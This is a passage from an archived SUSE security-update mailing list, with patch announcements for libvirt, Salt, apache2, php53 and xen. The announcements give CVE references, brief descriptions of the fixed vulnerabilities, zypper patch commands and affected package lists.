libvirt-daemon-driver-nwfilter-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-qemu-2.0.0-27.48.1 libvirt-daemon-driver-qemu-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-secret-2.0.0-27.48.1 libvirt-daemon-driver-secret-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-storage-2.0.0-27.48.1 libvirt-daemon-driver-storage-debuginfo-2.0.0-27.48.1 libvirt-daemon-hooks-2.0.0-27.48.1 libvirt-daemon-lxc-2.0.0-27.48.1 libvirt-daemon-qemu-2.0.0-27.48.1 libvirt-debugsource-2.0.0-27.48.1 libvirt-doc-2.0.0-27.48.1 libvirt-lock-sanlock-2.0.0-27.48.1 libvirt-lock-sanlock-debuginfo-2.0.0-27.48.1 libvirt-nss-2.0.0-27.48.1 libvirt-nss-debuginfo-2.0.0-27.48.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (x86_64): libvirt-daemon-driver-libxl-2.0.0-27.48.1 libvirt-daemon-driver-libxl-debuginfo-2.0.0-27.48.1 libvirt-daemon-xen-2.0.0-27.48.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): libvirt-2.0.0-27.48.1 libvirt-client-2.0.0-27.48.1 libvirt-client-debuginfo-2.0.0-27.48.1 libvirt-daemon-2.0.0-27.48.1 libvirt-daemon-config-network-2.0.0-27.48.1 libvirt-daemon-config-nwfilter-2.0.0-27.48.1 libvirt-daemon-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-interface-2.0.0-27.48.1 libvirt-daemon-driver-interface-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-lxc-2.0.0-27.48.1 libvirt-daemon-driver-lxc-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-network-2.0.0-27.48.1 libvirt-daemon-driver-network-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-qemu-2.0.0-27.48.1 libvirt-daemon-driver-qemu-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-secret-2.0.0-27.48.1 libvirt-daemon-driver-secret-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-storage-2.0.0-27.48.1 libvirt-daemon-driver-storage-debuginfo-2.0.0-27.48.1 libvirt-daemon-hooks-2.0.0-27.48.1 libvirt-daemon-lxc-2.0.0-27.48.1 libvirt-daemon-qemu-2.0.0-27.48.1 libvirt-debugsource-2.0.0-27.48.1 libvirt-doc-2.0.0-27.48.1 libvirt-lock-sanlock-2.0.0-27.48.1 libvirt-lock-sanlock-debuginfo-2.0.0-27.48.1 libvirt-nss-2.0.0-27.48.1 libvirt-nss-debuginfo-2.0.0-27.48.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (x86_64): libvirt-daemon-driver-libxl-2.0.0-27.48.1 libvirt-daemon-driver-libxl-debuginfo-2.0.0-27.48.1 libvirt-daemon-xen-2.0.0-27.48.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): libvirt-2.0.0-27.48.1 libvirt-client-2.0.0-27.48.1 libvirt-client-debuginfo-2.0.0-27.48.1 libvirt-daemon-2.0.0-27.48.1 libvirt-daemon-config-network-2.0.0-27.48.1 libvirt-daemon-config-nwfilter-2.0.0-27.48.1 libvirt-daemon-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-interface-2.0.0-27.48.1 libvirt-daemon-driver-interface-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-libxl-2.0.0-27.48.1 libvirt-daemon-driver-libxl-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-lxc-2.0.0-27.48.1 libvirt-daemon-driver-lxc-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-network-2.0.0-27.48.1 libvirt-daemon-driver-network-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-qemu-2.0.0-27.48.1 libvirt-daemon-driver-qemu-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-secret-2.0.0-27.48.1 libvirt-daemon-driver-secret-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-storage-2.0.0-27.48.1 libvirt-daemon-driver-storage-debuginfo-2.0.0-27.48.1 libvirt-daemon-hooks-2.0.0-27.48.1 libvirt-daemon-lxc-2.0.0-27.48.1 libvirt-daemon-qemu-2.0.0-27.48.1 libvirt-daemon-xen-2.0.0-27.48.1 libvirt-debugsource-2.0.0-27.48.1 libvirt-doc-2.0.0-27.48.1 libvirt-lock-sanlock-2.0.0-27.48.1 libvirt-lock-sanlock-debuginfo-2.0.0-27.48.1 libvirt-nss-2.0.0-27.48.1 libvirt-nss-debuginfo-2.0.0-27.48.1 - SUSE Enterprise Storage 4 (x86_64): libvirt-2.0.0-27.48.1 libvirt-client-2.0.0-27.48.1 libvirt-client-debuginfo-2.0.0-27.48.1 libvirt-daemon-2.0.0-27.48.1 libvirt-daemon-config-network-2.0.0-27.48.1 libvirt-daemon-config-nwfilter-2.0.0-27.48.1 libvirt-daemon-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-interface-2.0.0-27.48.1 libvirt-daemon-driver-interface-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-libxl-2.0.0-27.48.1 libvirt-daemon-driver-libxl-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-lxc-2.0.0-27.48.1 libvirt-daemon-driver-lxc-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-network-2.0.0-27.48.1 libvirt-daemon-driver-network-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-qemu-2.0.0-27.48.1 libvirt-daemon-driver-qemu-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-secret-2.0.0-27.48.1 libvirt-daemon-driver-secret-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-storage-2.0.0-27.48.1 libvirt-daemon-driver-storage-debuginfo-2.0.0-27.48.1 libvirt-daemon-hooks-2.0.0-27.48.1 libvirt-daemon-lxc-2.0.0-27.48.1 libvirt-daemon-qemu-2.0.0-27.48.1 libvirt-daemon-xen-2.0.0-27.48.1 libvirt-debugsource-2.0.0-27.48.1 libvirt-doc-2.0.0-27.48.1 libvirt-lock-sanlock-2.0.0-27.48.1 libvirt-lock-sanlock-debuginfo-2.0.0-27.48.1 libvirt-nss-2.0.0-27.48.1 libvirt-nss-debuginfo-2.0.0-27.48.1 References: https://www.suse.com/security/cve/CVE-2019-3840.html https://bugzilla.suse.com/1104662 https://bugzilla.suse.com/1120813 https://bugzilla.suse.com/1127458 From sle-security-updates at lists.suse.com Thu Apr 4 19:09:53 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 5 Apr 2019 03:09:53 +0200 (CEST) Subject: SUSE-SU-2019:0882-1: moderate: Security update for Salt Message-ID: <20190405010953.60B40FF2D@maintenance.suse.de> SUSE Security Update: Security update for Salt ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0882-1 Rating: moderate References: #1114029 #1122680 #1125015 Cross-References: CVE-2018-15750 CVE-2018-15751 Affected Products: SUSE Manager Tools 15-BETA ______________________________________________________________________________ An update that solves two vulnerabilities and has one errata is now available. Description: This update fixes the following issues: salt: - Removing patch to add root paramet to zypper module - Patch modification due to offset caused by previous patch removal - Fix for -t parameter in mount module - Async batch implementation - Update to 2019.2 release - Add virt.volume_infos and virt.volume_delete functions - Bugfix: properly refresh pillars (bsc#1125015) - Removes version from python3 requirement completely - Alignment with Salt 2019.2.0 RC2 from upstream. - Update to 2019.2.0~rc2 - Add virt.all_capabilities to return all host and domain capabilities at once - Don't call zypper with more than one --no-refresh (PR#51382) - Switch to better version nomenclature. Using ~ for the rc1 suffix. - Add "id_" and "force" to the whitelist of API check - Add metadata to accepted keyword arguments (bsc#1122680) - Fix "pkg.list_pkgs" output when using "attr" to take the arch into account (bsc#1114029) - Update Salt to 2019.2.0rc1 Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Manager Tools 15-BETA: zypper in -t patch SUSE-SLE-Manager-Tools-15-BETA-2019-882=1 Package List: - SUSE Manager Tools 15-BETA (aarch64 ppc64le s390x x86_64): python2-salt-2019.2.0-8.3.3 python3-salt-2019.2.0-8.3.3 salt-2019.2.0-8.3.3 salt-doc-2019.2.0-8.3.3 salt-minion-2019.2.0-8.3.3 - SUSE Manager Tools 15-BETA (noarch): salt-bash-completion-2019.2.0-8.3.3 salt-zsh-completion-2019.2.0-8.3.3 References: https://www.suse.com/security/cve/CVE-2018-15750.html https://www.suse.com/security/cve/CVE-2018-15751.html https://bugzilla.suse.com/1114029 https://bugzilla.suse.com/1122680 https://bugzilla.suse.com/1125015 From sle-security-updates at lists.suse.com Thu Apr 4 19:11:02 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 5 Apr 2019 03:11:02 +0200 (CEST) Subject: SUSE-SU-2019:0881-1: moderate: Security update for Salt Message-ID: <20190405011102.75468FF2D@maintenance.suse.de> SUSE Security Update: Security update for Salt ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0881-1 Rating: moderate References: #1114029 #1122680 #1125015 Cross-References: CVE-2018-15750 CVE-2018-15751 Affected Products: SUSE Manager Tools 12-BETA ______________________________________________________________________________ An update that solves two vulnerabilities and has one errata is now available. Description: This update fixes the following issues: salt: - Removing patch to add root paramet to zypper module - Patch modification due to offset caused by previous patch removal - Fix for -t parameter in mount module - Async batch implementation - Update to 2019.2 release - Add virt.volume_infos and virt.volume_delete functions - Bugfix: properly refresh pillars (bsc#1125015) - Removes version from python3 requirement completely - Alignment with Salt 2019.2.0 RC2 from upstream. - Update to 2019.2.0~rc2 - Add virt.all_capabilities to return all host and domain capabilities at once - Don't call zypper with more than one --no-refresh (PR#51382) - Switch to better version nomenclature. Using ~ for the rc1 suffix. - Add "id_" and "force" to the whitelist of API check - Add metadata to accepted keyword arguments (bsc#1122680) - Fix "pkg.list_pkgs" output when using "attr" to take the arch into account (bsc#1114029) - Update Salt to 2019.2.0rc1 Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Manager Tools 12-BETA: zypper in -t patch SUSE-SLE-Manager-Tools-12-BETA-2019-881=1 Package List: - SUSE Manager Tools 12-BETA (aarch64 ppc64le s390x x86_64): libzmq3-4.0.4-18.2.1 libzmq3-debuginfo-4.0.4-18.2.1 python-MarkupSafe-0.18-6.3.1 python-MarkupSafe-debuginfo-0.18-6.3.1 python-MarkupSafe-debugsource-0.18-6.3.1 python-PyYAML-3.12-29.2.1 python-PyYAML-debuginfo-3.12-29.2.1 python-PyYAML-debugsource-3.12-29.2.1 python-msgpack-python-0.4.6-11.2.1 python-msgpack-python-debuginfo-0.4.6-11.2.1 python-msgpack-python-debugsource-0.4.6-11.2.1 python-psutil-5.2.2-18.2.1 python-psutil-debuginfo-5.2.2-18.2.1 python-psutil-debugsource-5.2.2-18.2.1 python-pycrypto-2.6.1-13.2.1 python-pyzmq-14.0.0-12.2.1 python-pyzmq-debuginfo-14.0.0-12.2.1 python-pyzmq-debugsource-14.0.0-12.2.1 python-tornado-4.2.1-20.2.1 python-tornado-debuginfo-4.2.1-20.2.1 python-tornado-debugsource-4.2.1-20.2.1 python2-salt-2019.2.0-49.3.8 python3-MarkupSafe-0.18-6.3.1 python3-PyYAML-3.12-29.2.1 python3-msgpack-python-0.4.6-11.2.1 python3-psutil-5.2.2-18.2.1 python3-pycrypto-2.6.1-13.2.1 python3-pyzmq-14.0.0-12.2.1 python3-salt-2019.2.0-49.3.8 python3-tornado-4.2.1-20.2.1 salt-2019.2.0-49.3.8 salt-doc-2019.2.0-49.3.8 salt-minion-2019.2.0-49.3.8 zeromq-debugsource-4.0.4-18.2.1 - SUSE Manager Tools 12-BETA (ppc64le s390x x86_64): python-pycrypto-debuginfo-2.6.1-13.2.1 - SUSE Manager Tools 12-BETA (noarch): python-Jinja2-2.8-22.2.1 python-futures-3.0.2-18.2.1 python-requests-2.11.1-9.2.1 python3-Jinja2-2.8-22.2.1 python3-requests-2.11.1-9.2.1 References: https://www.suse.com/security/cve/CVE-2018-15750.html https://www.suse.com/security/cve/CVE-2018-15751.html https://bugzilla.suse.com/1114029 https://bugzilla.suse.com/1122680 https://bugzilla.suse.com/1125015 From sle-security-updates at lists.suse.com Fri Apr 5 04:13:46 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 5 Apr 2019 12:13:46 +0200 (CEST) Subject: SUSE-SU-2019:0888-1: important: Security update for apache2 Message-ID: <20190405101346.B54BEFF2D@maintenance.suse.de> SUSE Security Update: Security update for apache2 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0888-1 Rating: important References: #1122839 #1131239 #1131241 Cross-References: CVE-2018-17199 CVE-2019-0217 CVE-2019-0220 Affected Products: SUSE Linux Enterprise Server 12-SP1-LTSS ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for apache2 fixes the following issues: - CVE-2018-17199: A bug in Apache's "mod_session_cookie" lead to an issue where the module did not respect a cookie's expiry time. [bsc#1122839] * CVE-2019-0220: The Apache HTTP server did not use a consistent strategy for URL normalization throughout all of its components. In particular, consecutive slashes were not always collapsed. Attackers could potentially abuse these inconsistencies to by-pass access control mechanisms and thus gain unauthorized access to protected parts of the service. [bsc#1131241] * CVE-2019-0217: A race condition in Apache's "mod_auth_digest" when running in a threaded server could have allowed users with valid credentials to authenticate using another username, bypassing configured access control restrictions. [bsc#1131239] Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-888=1 Package List: - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): apache2-2.4.16-20.24.1 apache2-debuginfo-2.4.16-20.24.1 apache2-debugsource-2.4.16-20.24.1 apache2-example-pages-2.4.16-20.24.1 apache2-prefork-2.4.16-20.24.1 apache2-prefork-debuginfo-2.4.16-20.24.1 apache2-utils-2.4.16-20.24.1 apache2-utils-debuginfo-2.4.16-20.24.1 apache2-worker-2.4.16-20.24.1 apache2-worker-debuginfo-2.4.16-20.24.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (noarch): apache2-doc-2.4.16-20.24.1 References: https://www.suse.com/security/cve/CVE-2018-17199.html https://www.suse.com/security/cve/CVE-2019-0217.html https://www.suse.com/security/cve/CVE-2019-0220.html https://bugzilla.suse.com/1122839 https://bugzilla.suse.com/1131239 https://bugzilla.suse.com/1131241 From sle-security-updates at lists.suse.com Fri Apr 5 04:15:44 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 5 Apr 2019 12:15:44 +0200 (CEST) Subject: SUSE-SU-2019:0889-1: important: Security update for apache2 Message-ID: <20190405101544.BDB0BFF2D@maintenance.suse.de> SUSE Security Update: Security update for apache2 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0889-1 Rating: important References: #1122839 #1131239 #1131241 Cross-References: CVE-2018-17199 CVE-2019-0217 CVE-2019-0220 Affected Products: SUSE Linux Enterprise Server 12-LTSS ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for apache2 fixes the following issues: Security issues fixed: - CVE-2018-17199: A bug in Apache's "mod_session_cookie" lead to an issue where the module did not respect a cookie's expiry time. [bsc#1122839] * CVE-2019-0220: The Apache HTTP server did not use a consistent strategy for URL normalization throughout all of its components. In particular, consecutive slashes were not always collapsed. Attackers could potentially abuse these inconsistencies to by-pass access control mechanisms and thus gain unauthorized access to protected parts of the service. [bsc#1131241] * CVE-2019-0217: A race condition in Apache's "mod_auth_digest" when running in a threaded server could have allowed users with valid credentials to authenticate using another username, bypassing configured access control restrictions. [bsc#1131239] Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-889=1 Package List: - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): apache2-2.4.10-14.36.1 apache2-debuginfo-2.4.10-14.36.1 apache2-debugsource-2.4.10-14.36.1 apache2-example-pages-2.4.10-14.36.1 apache2-prefork-2.4.10-14.36.1 apache2-prefork-debuginfo-2.4.10-14.36.1 apache2-utils-2.4.10-14.36.1 apache2-utils-debuginfo-2.4.10-14.36.1 apache2-worker-2.4.10-14.36.1 apache2-worker-debuginfo-2.4.10-14.36.1 - SUSE Linux Enterprise Server 12-LTSS (noarch): apache2-doc-2.4.10-14.36.1 References: https://www.suse.com/security/cve/CVE-2018-17199.html https://www.suse.com/security/cve/CVE-2019-0217.html https://www.suse.com/security/cve/CVE-2019-0220.html https://bugzilla.suse.com/1122839 https://bugzilla.suse.com/1131239 https://bugzilla.suse.com/1131241 From sle-security-updates at lists.suse.com Fri Apr 5 13:19:18 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 5 Apr 2019 21:19:18 +0200 (CEST) Subject: SUSE-SU-2019:14013-1: moderate: Security update for php53 Message-ID: <20190405191918.5734A1012B@maintenance.suse.de> SUSE Security Update: Security update for php53 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14013-1 Rating: moderate References: #1126711 #1126713 #1126821 #1126823 #1127122 #1128722 #1128883 #1128886 #1128887 #1128889 #1128892 Cross-References: CVE-2018-20783 CVE-2019-9020 CVE-2019-9021 CVE-2019-9023 CVE-2019-9024 CVE-2019-9637 CVE-2019-9638 CVE-2019-9639 CVE-2019-9640 CVE-2019-9641 CVE-2019-9675 Affected Products: SUSE Linux Enterprise Software Development Kit 11-SP4 SUSE Linux Enterprise Server 11-SP4 SUSE Linux Enterprise Point of Sale 11-SP3 SUSE Linux Enterprise Debuginfo 11-SP4 ______________________________________________________________________________ An update that fixes 11 vulnerabilities is now available. Description: This update for php53 fixes the following issues: Security issues fixed: - CVE-2019-9637: Fixed improper implementation of rename function and multiple invalid memory access in EXIF extension (bsc#1128892). - CVE-2019-9675: Fixed improper implementation of rename function and multiple invalid memory access in EXIF extension (bsc#1128886). - CVE-2019-9638: Fixed improper implementation of rename function and multiple invalid memory access in EXIF extension ((bsc#1128889). - CVE-2019-9639: Fixed improper implementation of rename function and multiple invalid memory access in EXIF extension (bsc#1128887). - CVE-2019-9640: Fixed improper implementation of rename function and multiple invalid memory access in EXIF extension (bsc#1128883). - CVE-2019-9024: Fixed a vulnerability in xmlrpc_decode function which could allow to a hostile XMLRPC server to cause memory read outside the allocated areas (bsc#1126821). - CVE-2019-9020: Fixed a heap out of bounds in xmlrpc_decode function (bsc#1126711). - CVE-2018-20783: Fixed a buffer over-read in PHAR reading functions which could allow an attacker to read allocated and unallocated memory when parsing a phar file (bsc#1127122). - CVE-2019-9021: Fixed a heap buffer-based buffer over-read in PHAR reading functions which could allow an attacker to read allocated and unallocated memory when parsing a phar file (bsc#1126713). - CVE-2019-9023: Fixed multiple heap-based buffer over-read instances in mbstring regular expression functions (bsc#1126823). - CVE-2019-9641: Fixed multiple invalid memory access in EXIF extension and improved insecure implementation of rename function (bsc#1128722). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 11-SP4: zypper in -t patch sdksp4-php53-14013=1 - SUSE Linux Enterprise Server 11-SP4: zypper in -t patch slessp4-php53-14013=1 - SUSE Linux Enterprise Point of Sale 11-SP3: zypper in -t patch sleposp3-php53-14013=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-php53-14013=1 Package List: - SUSE Linux Enterprise Software Development Kit 11-SP4 (i586 ia64 ppc64 s390x x86_64): php53-devel-5.3.17-112.58.1 php53-imap-5.3.17-112.58.1 php53-posix-5.3.17-112.58.1 php53-readline-5.3.17-112.58.1 php53-sockets-5.3.17-112.58.1 php53-sqlite-5.3.17-112.58.1 php53-tidy-5.3.17-112.58.1 - SUSE Linux Enterprise Server 11-SP4 (i586 ia64 ppc64 s390x x86_64): apache2-mod_php53-5.3.17-112.58.1 php53-5.3.17-112.58.1 php53-bcmath-5.3.17-112.58.1 php53-bz2-5.3.17-112.58.1 php53-calendar-5.3.17-112.58.1 php53-ctype-5.3.17-112.58.1 php53-curl-5.3.17-112.58.1 php53-dba-5.3.17-112.58.1 php53-dom-5.3.17-112.58.1 php53-exif-5.3.17-112.58.1 php53-fastcgi-5.3.17-112.58.1 php53-fileinfo-5.3.17-112.58.1 php53-ftp-5.3.17-112.58.1 php53-gd-5.3.17-112.58.1 php53-gettext-5.3.17-112.58.1 php53-gmp-5.3.17-112.58.1 php53-iconv-5.3.17-112.58.1 php53-intl-5.3.17-112.58.1 php53-json-5.3.17-112.58.1 php53-ldap-5.3.17-112.58.1 php53-mbstring-5.3.17-112.58.1 php53-mcrypt-5.3.17-112.58.1 php53-mysql-5.3.17-112.58.1 php53-odbc-5.3.17-112.58.1 php53-openssl-5.3.17-112.58.1 php53-pcntl-5.3.17-112.58.1 php53-pdo-5.3.17-112.58.1 php53-pear-5.3.17-112.58.1 php53-pgsql-5.3.17-112.58.1 php53-pspell-5.3.17-112.58.1 php53-shmop-5.3.17-112.58.1 php53-snmp-5.3.17-112.58.1 php53-soap-5.3.17-112.58.1 php53-suhosin-5.3.17-112.58.1 php53-sysvmsg-5.3.17-112.58.1 php53-sysvsem-5.3.17-112.58.1 php53-sysvshm-5.3.17-112.58.1 php53-tokenizer-5.3.17-112.58.1 php53-wddx-5.3.17-112.58.1 php53-xmlreader-5.3.17-112.58.1 php53-xmlrpc-5.3.17-112.58.1 php53-xmlwriter-5.3.17-112.58.1 php53-xsl-5.3.17-112.58.1 php53-zip-5.3.17-112.58.1 php53-zlib-5.3.17-112.58.1 - SUSE Linux Enterprise Point of Sale 11-SP3 (i586): apache2-mod_php53-5.3.17-112.58.1 php53-5.3.17-112.58.1 php53-bcmath-5.3.17-112.58.1 php53-bz2-5.3.17-112.58.1 php53-calendar-5.3.17-112.58.1 php53-ctype-5.3.17-112.58.1 php53-curl-5.3.17-112.58.1 php53-dba-5.3.17-112.58.1 php53-dom-5.3.17-112.58.1 php53-exif-5.3.17-112.58.1 php53-fastcgi-5.3.17-112.58.1 php53-fileinfo-5.3.17-112.58.1 php53-ftp-5.3.17-112.58.1 php53-gd-5.3.17-112.58.1 php53-gettext-5.3.17-112.58.1 php53-gmp-5.3.17-112.58.1 php53-iconv-5.3.17-112.58.1 php53-intl-5.3.17-112.58.1 php53-json-5.3.17-112.58.1 php53-ldap-5.3.17-112.58.1 php53-mbstring-5.3.17-112.58.1 php53-mcrypt-5.3.17-112.58.1 php53-mysql-5.3.17-112.58.1 php53-odbc-5.3.17-112.58.1 php53-openssl-5.3.17-112.58.1 php53-pcntl-5.3.17-112.58.1 php53-pdo-5.3.17-112.58.1 php53-pear-5.3.17-112.58.1 php53-pgsql-5.3.17-112.58.1 php53-pspell-5.3.17-112.58.1 php53-shmop-5.3.17-112.58.1 php53-snmp-5.3.17-112.58.1 php53-soap-5.3.17-112.58.1 php53-suhosin-5.3.17-112.58.1 php53-sysvmsg-5.3.17-112.58.1 php53-sysvsem-5.3.17-112.58.1 php53-sysvshm-5.3.17-112.58.1 php53-tokenizer-5.3.17-112.58.1 php53-wddx-5.3.17-112.58.1 php53-xmlreader-5.3.17-112.58.1 php53-xmlrpc-5.3.17-112.58.1 php53-xmlwriter-5.3.17-112.58.1 php53-xsl-5.3.17-112.58.1 php53-zip-5.3.17-112.58.1 php53-zlib-5.3.17-112.58.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ia64 ppc64 s390x x86_64): php53-debuginfo-5.3.17-112.58.1 php53-debugsource-5.3.17-112.58.1 References: https://www.suse.com/security/cve/CVE-2018-20783.html https://www.suse.com/security/cve/CVE-2019-9020.html https://www.suse.com/security/cve/CVE-2019-9021.html https://www.suse.com/security/cve/CVE-2019-9023.html https://www.suse.com/security/cve/CVE-2019-9024.html https://www.suse.com/security/cve/CVE-2019-9637.html https://www.suse.com/security/cve/CVE-2019-9638.html https://www.suse.com/security/cve/CVE-2019-9639.html https://www.suse.com/security/cve/CVE-2019-9640.html https://www.suse.com/security/cve/CVE-2019-9641.html https://www.suse.com/security/cve/CVE-2019-9675.html https://bugzilla.suse.com/1126711 https://bugzilla.suse.com/1126713 https://bugzilla.suse.com/1126821 https://bugzilla.suse.com/1126823 https://bugzilla.suse.com/1127122 https://bugzilla.suse.com/1128722 https://bugzilla.suse.com/1128883 https://bugzilla.suse.com/1128886 https://bugzilla.suse.com/1128887 https://bugzilla.suse.com/1128889 https://bugzilla.suse.com/1128892 From sle-security-updates at lists.suse.com Fri Apr 5 13:22:09 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 5 Apr 2019 21:22:09 +0200 (CEST) Subject: SUSE-SU-2019:0891-1: important: Security update for xen Message-ID: <20190405192209.617361012B@maintenance.suse.de> SUSE Security Update: Security update for xen ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0891-1 Rating: important References: #1026236 #1027519 #1069468 #1119161 #1120067 #1123157 #1126140 #1126141 #1126192 #1126195 #1126196 #1126197 #1126198 #1126201 #1126325 #1127400 #1127620 #1129623 Cross-References: CVE-2019-6778 CVE-2019-9824 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Desktop 12-SP4 ______________________________________________________________________________ An update that solves two vulnerabilities and has 16 fixes is now available. Description: This update for xen fixes the following issues: Security issues fixed: - Fixed an issue which could allow malicious PV guests may cause a host crash or gain access to data pertaining to other guests.Additionally, vulnerable configurations are likely to be unstable even in the absence of an attack (bsc#1126198). - Fixed multiple access violations introduced by XENMEM_exchange hypercall which could allow a single PV guest to leak arbitrary amounts of memory, leading to a denial of service (bsc#1126192). - Fixed an issue which could allow a malicious unprivileged guest userspace process to escalate its privilege to that of other userspace processes in the same guest and potentially thereby to that of the guest operating system (bsc#1126201). - Fixed an issue which could allow malicious or buggy x86 PV guest kernels to mount a Denial of Service attack affecting the whole system (bsc#1126197). - Fixed an issue which could allow an untrusted PV domain with access to a physical device to DMA into its own pagetables leading to privilege escalation (bsc#1126195). - Fixed an issue which could allow a malicious or buggy x86 PV guest kernels can mount a Denial of Service attack affecting the whole system (bsc#1126196). - CVE-2019-6778: Fixed a heap buffer overflow in tcp_emu() found in slirp (bsc#1123157). - Fixed an issue which could allow malicious 64bit PV guests to cause a host crash (bsc#1127400). - Fixed an issue which could allow malicious or buggy guests with passed through PCI devices to be able to escalate their privileges, crash the host, or access data belonging to other guests. Additionally memory leaks were also possible (bsc#1126140). - Fixed a race condition issue which could allow malicious PV guests to escalate their privilege to that of the hypervisor (bsc#1126141). - CVE-2019-9824: Fixed an information leak in SLiRP networking implementation which could allow a user/process to read uninitialised stack memory contents (bsc#1129623). Other issues addressed: - Upstream bug fixes (bsc#1027519) - Packages should no longer use /var/adm/fillup-templates (bsc#1069468). - Added Xen cmdline option "suse_vtsc_tolerance" to avoid TSC emulation for HVM domUs (bsc#1026236). - Fixed an issue where setup of grant_tables and other variables may fail (bsc#1126325). - Fixed a building issue (bsc#1119161). - Added a requirement for xen, xl.cfg firmware="pvgrub32|pvgrub64 (bsc#1127620). - Fixed a segmetation fault in Libvirt when crash triggered on top of HVM guest (bsc#1120067). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-891=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-891=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-891=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 x86_64): xen-debugsource-4.11.1_04-2.6.1 xen-devel-4.11.1_04-2.6.1 - SUSE Linux Enterprise Server 12-SP4 (x86_64): xen-4.11.1_04-2.6.1 xen-debugsource-4.11.1_04-2.6.1 xen-doc-html-4.11.1_04-2.6.1 xen-libs-32bit-4.11.1_04-2.6.1 xen-libs-4.11.1_04-2.6.1 xen-libs-debuginfo-32bit-4.11.1_04-2.6.1 xen-libs-debuginfo-4.11.1_04-2.6.1 xen-tools-4.11.1_04-2.6.1 xen-tools-debuginfo-4.11.1_04-2.6.1 xen-tools-domU-4.11.1_04-2.6.1 xen-tools-domU-debuginfo-4.11.1_04-2.6.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): xen-4.11.1_04-2.6.1 xen-debugsource-4.11.1_04-2.6.1 